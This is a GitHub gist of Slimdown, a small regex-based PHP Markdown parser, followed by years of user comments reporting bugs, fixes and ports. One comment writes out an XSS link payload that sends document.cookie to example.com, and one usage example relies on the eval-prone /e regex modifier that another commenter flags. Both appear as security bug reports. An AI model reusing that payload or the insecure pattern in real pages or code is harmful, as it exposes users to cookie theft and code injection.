Instantly share code, notes, and snippets.

Embed
What would you like to do?
Slimdown - A simple regex-based Markdown parser.

Slimdown

A very basic regex-based Markdown parser. Supports the following elements (and can be extended via Slimdown::add_rule()):

  • Headers
  • Links
  • Bold
  • Emphasis
  • Deletions
  • Quotes
  • Inline code
  • Blockquotes
  • Ordered/unordered lists

Usage

Here is the general use case:

<?php

require_once ('Slimdown.php');

echo Slimdown::render (
	"# Page title\n\nAnd **now** for something _completely_ different."
);

?>

Adding rules

A simple rule to convert :) to an image:

<?php

require_once ('Slimdown.php');

Slimdown::add_rule ('/(\W)\:\)(\W)/', '\1<img src="smiley.png" />\2');

echo Slimdown::render ('Know what I\'m sayin? :)');

?>

In this example, we add GitHub-style internal linking (e.g., [[Another Page]]).

<?php

require_once ('Slimdown.php');

function mywiki_internal_link ($title) {
	return sprintf (
		'<a href="%s">%s</a>',
		preg_replace ('/[^a-zA-Z0-9_-]+/', '-', $title),
		$title
	);
}

Slimdown::add_rule ('/\[\[(.*?)\]\]/e', 'mywiki_internal_link (\'\\1\')');

echo Slimdown::render ('Check [[This Page]] out!');

?>

A longer example

<?php

require_once ('Slimdown.php');

echo Slimdown::render ("# Title

And *now* [a link](http://www.google.com) to **follow** and [another](http://yahoo.com/).

* One
* Two
* Three

## Subhead

One **two** three **four** five.

One __two__ three _four_ five __six__ seven _eight_.

1. One
2. Two
3. Three

More text with `inline($code)` sample.

> A block quote
> across two lines.

More text...");

?>
<?php
/**
* Slimdown - A very basic regex-based Markdown parser. Supports the
* following elements (and can be extended via Slimdown::add_rule()):
*
* - Headers
* - Links
* - Bold
* - Emphasis
* - Deletions
* - Quotes
* - Inline code
* - Blockquotes
* - Ordered/unordered lists
* - Horizontal rules
*
* Author: Johnny Broadway <johnny@johnnybroadway.com>
* Website: https://gist.github.com/jbroadway/2836900
* License: MIT
*/
class Slimdown {
public static $rules = array (
'/(#+)(.*)/' => 'self::header', // headers
'/\[([^\[]+)\]\(([^\)]+)\)/' => '<a href=\'\2\'>\1</a>', // links
'/(\*\*|__)(.*?)\1/' => '<strong>\2</strong>', // bold
'/(\*|_)(.*?)\1/' => '<em>\2</em>', // emphasis
'/\~\~(.*?)\~\~/' => '<del>\1</del>', // del
'/\:\"(.*?)\"\:/' => '<q>\1</q>', // quote
'/`(.*?)`/' => '<code>\1</code>', // inline code
'/\n\*(.*)/' => 'self::ul_list', // ul lists
'/\n[0-9]+\.(.*)/' => 'self::ol_list', // ol lists
'/\n(&gt;|\>)(.*)/' => 'self::blockquote ', // blockquotes
'/\n-{5,}/' => "\n<hr />", // horizontal rule
'/\n([^\n]+)\n/' => 'self::para', // add paragraphs
'/<\/ul>\s?<ul>/' => '', // fix extra ul
'/<\/ol>\s?<ol>/' => '', // fix extra ol
'/<\/blockquote><blockquote>/' => "\n" // fix extra blockquote
);
private static function para ($regs) {
$line = $regs[1];
$trimmed = trim ($line);
if (preg_match ('/^<\/?(ul|ol|li|h|p|bl)/', $trimmed)) {
return "\n" . $line . "\n";
}
return sprintf ("\n<p>%s</p>\n", $trimmed);
}
private static function ul_list ($regs) {
$item = $regs[1];
return sprintf ("\n<ul>\n\t<li>%s</li>\n</ul>", trim ($item));
}
private static function ol_list ($regs) {
$item = $regs[1];
return sprintf ("\n<ol>\n\t<li>%s</li>\n</ol>", trim ($item));
}
private static function blockquote ($regs) {
$item = $regs[2];
return sprintf ("\n<blockquote>%s</blockquote>", trim ($item));
}
private static function header ($regs) {
list ($tmp, $chars, $header) = $regs;
$level = strlen ($chars);
return sprintf ('<h%d>%s</h%d>', $level, trim ($header), $level);
}
/**
* Add a rule.
*/
public static function add_rule ($regex, $replacement) {
self::$rules[$regex] = $replacement;
}
/**
* Render some Markdown into HTML.
*/
public static function render ($text) {
$text = "\n" . $text . "\n";
foreach (self::$rules as $regex => $replacement) {
if (is_callable ( $replacement)) {
$text = preg_replace_callback ($regex, $replacement, $text);
} else {
$text = preg_replace ($regex, $replacement, $text);
}
}
return trim ($text);
}
}
@ghost

This comment has been minimized.

Show comment
Hide comment
@ghost

ghost Jun 9, 2012

Double lines create a new paragraph, however if someone does...

this

the paragraph

function

will

skip every other line

ghost commented Jun 9, 2012

Double lines create a new paragraph, however if someone does...

this

the paragraph

function

will

skip every other line

@alexanderGugel

This comment has been minimized.

Show comment
Hide comment
@alexanderGugel

alexanderGugel May 30, 2013

Simple, but great.

What about the license?

alexanderGugel commented May 30, 2013

Simple, but great.

What about the license?

@jbroadway

This comment has been minimized.

Show comment
Hide comment
@jbroadway

jbroadway Jun 24, 2013

Just added a license to the file. Let's go with MIT :)

Owner

jbroadway commented Jun 24, 2013

Just added a license to the file. Let's go with MIT :)

@greenphp

This comment has been minimized.

Show comment
Hide comment
@greenphp

greenphp Jul 8, 2013

Found a small bug. See the example!

The source markdown

An **indie electronica music** bundle.

**Featuring** songs by ...

Pay what you want for Music

Slimdown creates this html

<p>
  An <strong>indie electronica music<strong> bundle.
</p>
<strong>Featuring</strong> songs by ...
<p>
  Pay what you want for Music
</p>

should be this.

<p>
  An <strong>indie electronica music<strong> bundle.
</p>
<p>
   <strong>Featuring</strong> songs by ...
</p>
<p>
  Pay what you want for Music
</p>

greenphp commented Jul 8, 2013

Found a small bug. See the example!

The source markdown

An **indie electronica music** bundle.

**Featuring** songs by ...

Pay what you want for Music

Slimdown creates this html

<p>
  An <strong>indie electronica music<strong> bundle.
</p>
<strong>Featuring</strong> songs by ...
<p>
  Pay what you want for Music
</p>

should be this.

<p>
  An <strong>indie electronica music<strong> bundle.
</p>
<p>
   <strong>Featuring</strong> songs by ...
</p>
<p>
  Pay what you want for Music
</p>
@filipkemuel

This comment has been minimized.

Show comment
Hide comment
@filipkemuel

filipkemuel Aug 17, 2013

Solution to above bug is simple. Simply replace

        '/\n([^\n]+)\n/e' => 'self::para (\'\\1\')',              // add paragraphs

with

        '/\n([^\n]+)/e' => 'self::para (\'\\1\')',              // add paragraphs

then every line wil become a paragraph.

filipkemuel commented Aug 17, 2013

Solution to above bug is simple. Simply replace

        '/\n([^\n]+)\n/e' => 'self::para (\'\\1\')',              // add paragraphs

with

        '/\n([^\n]+)/e' => 'self::para (\'\\1\')',              // add paragraphs

then every line wil become a paragraph.

@inf3rno

This comment has been minimized.

Show comment
Hide comment
@inf3rno

inf3rno Nov 9, 2013

You should never use this code on a website:
eval injection
XSS

inf3rno commented Nov 9, 2013

You should never use this code on a website:
eval injection
XSS

@josegonzalez

This comment has been minimized.

Show comment
Hide comment
@josegonzalez

josegonzalez Dec 25, 2013

No codeblock support :(

josegonzalez commented Dec 25, 2013

No codeblock support :(

@jbroadway

This comment has been minimized.

Show comment
Hide comment
@jbroadway

jbroadway Jan 11, 2014

Thanks @inf3rno, I've switched it to using preg_replace_callback() to prevent eval injection. XSS is still possible without further filtering, but that's not the purpose of this library (and technically Markdown supports arbitrary HTML too, so it ought to come from a trusted source).

Owner

jbroadway commented Jan 11, 2014

Thanks @inf3rno, I've switched it to using preg_replace_callback() to prevent eval injection. XSS is still possible without further filtering, but that's not the purpose of this library (and technically Markdown supports arbitrary HTML too, so it ought to come from a trusted source).

@paulcuth

This comment has been minimized.

Show comment
Hide comment
@paulcuth

paulcuth Feb 13, 2014

I've also ported this to Lua: https://gist.github.com/paulcuth/8967731

Cheers for the good work.

paulcuth commented Feb 13, 2014

I've also ported this to Lua: https://gist.github.com/paulcuth/8967731

Cheers for the good work.

@pph7

This comment has been minimized.

Show comment
Hide comment
@pph7

pph7 Apr 4, 2014

Great! Just a small bug: the line

'/\n(&gt;|\>)(.*)/' => 'self::blockquote ', 

contains an additional space after "blockquoute" which prevents the function to be applied.

Anyway, thanx a lot!

pph7 commented Apr 4, 2014

Great! Just a small bug: the line

'/\n(&gt;|\>)(.*)/' => 'self::blockquote ', 

contains an additional space after "blockquoute" which prevents the function to be applied.

Anyway, thanx a lot!

@funnylookinhat

This comment has been minimized.

Show comment
Hide comment
@funnylookinhat

funnylookinhat Dec 9, 2014

This has been incredibly useful - but I found an issue with links that have underscores... I'm honestly not sure if there would be an easy way to fix this without creating some hierarchy of rules.

Slimdown::render("# Links fail with underscores

[Test Link](http://www.google.com/?some_param=another_value)
");

Produces:

<h1>Links fail with underscores</h1>

<p><a href='http://www.google.com/?some<em>param=another</em>value'>Test Link</a></p>

In reality it should produce:

<h1>Links fail with underscores</h1>

<p><a href='http://www.google.com/?some_param=another_value'>Test Link</a></p>

funnylookinhat commented Dec 9, 2014

This has been incredibly useful - but I found an issue with links that have underscores... I'm honestly not sure if there would be an easy way to fix this without creating some hierarchy of rules.

Slimdown::render("# Links fail with underscores

[Test Link](http://www.google.com/?some_param=another_value)
");

Produces:

<h1>Links fail with underscores</h1>

<p><a href='http://www.google.com/?some<em>param=another</em>value'>Test Link</a></p>

In reality it should produce:

<h1>Links fail with underscores</h1>

<p><a href='http://www.google.com/?some_param=another_value'>Test Link</a></p>
@philtune

This comment has been minimized.

Show comment
Hide comment
@philtune

philtune Mar 25, 2015

Not sure how to prevent the unnecessary paragraphs around block-level HTML...

<p><table></p>
    <tr><th>Balance</th><td>$2,000</td></tr>
<p><tr><th>APR</th><td>14.5%</td></tr></p>
    <tr><th>Estimated min. monthly payment</th><td>$40.00</td></tr>
<p><tr><th>Years to payoff</th><td>14</td></tr></p>
    <tr><th>Estimated total interest</th><td>$2,070</td></tr>
<p></table></p>

Ahh, just fixed it... I added those elements to the para() regex:

if (preg_match ('/^<\/?(ul|ol|li|h|p|bl|table|tr|td)/', $trimmed)) {
    return "\n" . $line . "\n";
}

Thanks so much for this gist!

philtune commented Mar 25, 2015

Not sure how to prevent the unnecessary paragraphs around block-level HTML...

<p><table></p>
    <tr><th>Balance</th><td>$2,000</td></tr>
<p><tr><th>APR</th><td>14.5%</td></tr></p>
    <tr><th>Estimated min. monthly payment</th><td>$40.00</td></tr>
<p><tr><th>Years to payoff</th><td>14</td></tr></p>
    <tr><th>Estimated total interest</th><td>$2,070</td></tr>
<p></table></p>

Ahh, just fixed it... I added those elements to the para() regex:

if (preg_match ('/^<\/?(ul|ol|li|h|p|bl|table|tr|td)/', $trimmed)) {
    return "\n" . $line . "\n";
}

Thanks so much for this gist!

@philtune

This comment has been minimized.

Show comment
Hide comment
@philtune

philtune Mar 25, 2015

Also, I believe your header regex should start with a newline (\n)

'/\n(#+)(.*)/'

...to prevent things like <a href="<em>top</em>">Top</a>

philtune commented Mar 25, 2015

Also, I believe your header regex should start with a newline (\n)

'/\n(#+)(.*)/'

...to prevent things like <a href="<em>top</em>">Top</a>

@bennyn

This comment has been minimized.

Show comment
Hide comment
@bennyn

bennyn Apr 7, 2015

Thanks for sharing your Markdown parser! I just noticed that it matches only ***B** when your input is ***B***. So it misses to capture an asterisk for the strong / bold markup.

You can easily check that in the JavaScript console of your browser by using the RegEx from the Slimdown Parser for "strong":

"***B***".match(/(\*\*|__)(.*?)\1/g)

bennyn commented Apr 7, 2015

Thanks for sharing your Markdown parser! I just noticed that it matches only ***B** when your input is ***B***. So it misses to capture an asterisk for the strong / bold markup.

You can easily check that in the JavaScript console of your browser by using the RegEx from the Slimdown Parser for "strong":

"***B***".match(/(\*\*|__)(.*?)\1/g)
@possatti

This comment has been minimized.

Show comment
Hide comment
@possatti

possatti Jun 5, 2015

Woow! I very much like your idea of converting Markdown only using regex. I think of doing the same thing from Markdown to LaTeX any day. While this doesn't happen, I created a similar python script, based on your work, called Piedown. Hope it can be useful for someone.

possatti commented Jun 5, 2015

Woow! I very much like your idea of converting Markdown only using regex. I think of doing the same thing from Markdown to LaTeX any day. While this doesn't happen, I created a similar python script, based on your work, called Piedown. Hope it can be useful for someone.

@arnaudjuracek

This comment has been minimized.

Show comment
Hide comment
@arnaudjuracek

arnaudjuracek Jul 1, 2015

Awesome, thanks !

Support for image ![Alt text](/path/to/img.jpg) syntax :

<?php
    unset(Slimdown::$rules['/\[([^\[]+)\]\(([^\)]+)\)/']);
    Slimdown::add_rule('/!\[([^\[]+)\]\(([^\)]+)\)/', '<img src=\'\2\' alt=\'\1\'>');
    Slimdown::add_rule('/\[([^\[]+)\]\(([^\)]+)\)/', '<a href=\'\2\'>\1</a>');
?>

arnaudjuracek commented Jul 1, 2015

Awesome, thanks !

Support for image ![Alt text](/path/to/img.jpg) syntax :

<?php
    unset(Slimdown::$rules['/\[([^\[]+)\]\(([^\)]+)\)/']);
    Slimdown::add_rule('/!\[([^\[]+)\]\(([^\)]+)\)/', '<img src=\'\2\' alt=\'\1\'>');
    Slimdown::add_rule('/\[([^\[]+)\]\(([^\)]+)\)/', '<a href=\'\2\'>\1</a>');
?>
@renehamburger

This comment has been minimized.

Show comment
Hide comment
@renehamburger

renehamburger Sep 3, 2015

I've just ported this to JavaScript (ES5): slimdown.js.

renehamburger commented Sep 3, 2015

I've just ported this to JavaScript (ES5): slimdown.js.

@tovic

This comment has been minimized.

Show comment
Hide comment
@tovic

tovic Feb 5, 2016

Just want to share my simple PHP Markdown parser. It supports code block and smartypants 😄https://gist.github.com/tovic/f349cf63d644eec04fe9

tovic commented Feb 5, 2016

Just want to share my simple PHP Markdown parser. It supports code block and smartypants 😄https://gist.github.com/tovic/f349cf63d644eec04fe9

@handonam

This comment has been minimized.

Show comment
Hide comment
@handonam

handonam Mar 6, 2016

Great work!! My only concern was this [^\)] portion of the hyperlink set, which accepts anything except the ending ). Couldn't this theoretically be executed?

[My XSS Attempt](javascript:window.location="http://example.com?yourCookie=" + document.cookie)

That's something that kind of frightens me.

edit: would something like this maybe work?

/\[([^\[]+)\]\((?:javascript:)?([^\)]+)\)/

This would put javascript: as an optional non-capturing group, but still retain the other groups as intended.

handonam commented Mar 6, 2016

Great work!! My only concern was this [^\)] portion of the hyperlink set, which accepts anything except the ending ). Couldn't this theoretically be executed?

[My XSS Attempt](javascript:window.location="http://example.com?yourCookie=" + document.cookie)

That's something that kind of frightens me.

edit: would something like this maybe work?

/\[([^\[]+)\]\((?:javascript:)?([^\)]+)\)/

This would put javascript: as an optional non-capturing group, but still retain the other groups as intended.

@tonioloewald

This comment has been minimized.

Show comment
Hide comment
@tonioloewald

tonioloewald Mar 14, 2016

The regex for links should be [^\]] (anything but a closing bracket) not [\^[]

tonioloewald commented Mar 14, 2016

The regex for links should be [^\]] (anything but a closing bracket) not [\^[]

@bulrush15

This comment has been minimized.

Show comment
Hide comment
@bulrush15

bulrush15 Jun 8, 2016

Wow! This would be nice ported to Freepascal as a component. http://www.freepascal.org/. I'm stuck on converting MD to HTML lists because they are supposed to support lists within lists. I'm still new to Freepascal so I'm not good enough to convert it.

bulrush15 commented Jun 8, 2016

Wow! This would be nice ported to Freepascal as a component. http://www.freepascal.org/. I'm stuck on converting MD to HTML lists because they are supposed to support lists within lists. I'm still new to Freepascal so I'm not good enough to convert it.

@wwiechorek

This comment has been minimized.

Show comment
Hide comment
@wwiechorek

wwiechorek Oct 4, 2016

In blockquote fix, I changed.
of:

'/<\/blockquote><blockquote>/' => "\n"

to:

'/<\/blockquote>\n<blockquote>/' => "<br>"

wwiechorek commented Oct 4, 2016

In blockquote fix, I changed.
of:

'/<\/blockquote><blockquote>/' => "\n"

to:

'/<\/blockquote>\n<blockquote>/' => "<br>"
@WaKeMaTTa

This comment has been minimized.

Show comment
Hide comment
@WaKeMaTTa

WaKeMaTTa Oct 17, 2016

@jbroadway why did you create a gist and not a repo?

WaKeMaTTa commented Oct 17, 2016

@jbroadway why did you create a gist and not a repo?

@kiwichrish

This comment has been minimized.

Show comment
Hide comment
@kiwichrish

kiwichrish Nov 20, 2016

hi.. Very handy.. Dropped it into codeigniter for a project. Are you still maintaining it? Found the space after blockquote error and went to push the change and realised I can't for a gist?

kiwichrish commented Nov 20, 2016

hi.. Very handy.. Dropped it into codeigniter for a project. Are you still maintaining it? Found the space after blockquote error and went to push the change and realised I can't for a gist?

@robinchrist

This comment has been minimized.

Show comment
Hide comment
@robinchrist

robinchrist Apr 30, 2017

Hey,
I created a c++ port for a coding challenge: libMarkdownParser https://github.com/robinchrist/libMarkdownParser
Simple command line interfac: https://github.com/robinchrist/MarkdownParserCLI

Have fun!

robinchrist commented Apr 30, 2017

Hey,
I created a c++ port for a coding challenge: libMarkdownParser https://github.com/robinchrist/libMarkdownParser
Simple command line interfac: https://github.com/robinchrist/MarkdownParserCLI

Have fun!

@mischapeters

This comment has been minimized.

Show comment
Hide comment
@mischapeters

mischapeters Jul 18, 2017

Fix for when you want to use # in inline code or blockquote.
Replace: '/(#+)(.*)/' => 'self::header',
With: '/\n(#+)(.*)/' => 'self::header',

mischapeters commented Jul 18, 2017

Fix for when you want to use # in inline code or blockquote.
Replace: '/(#+)(.*)/' => 'self::header',
With: '/\n(#+)(.*)/' => 'self::header',

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment